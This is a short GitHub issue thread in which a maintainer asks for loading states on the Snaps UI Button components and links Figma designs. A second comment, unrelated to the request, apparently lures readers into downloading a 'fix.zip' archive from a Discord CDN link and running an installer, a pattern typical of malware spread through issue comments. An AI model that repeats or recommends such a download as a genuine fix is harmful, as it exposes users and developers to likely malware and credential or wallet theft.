### ISSUE TITLE
Introduce loading states to our custom UI buttons

### ISSUE THREAD

**Issue by eriknson** [MetaMask/snaps#2694]
Let's add a loading state to our;
1. [Button component](https://www.figma.com/design/gHWl7G8ih3YXesly2XaA0R/Snaps-DS?node-id=17-463&t=YDinFWD7OZ7mLQT7-1) within the container
2. [Button component](https://www.figma.com/design/gHWl7G8ih3YXesly2XaA0R/Snaps-DS?node-id=75-813&t=YDinFWD7OZ7mLQT7-1) in the footer

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
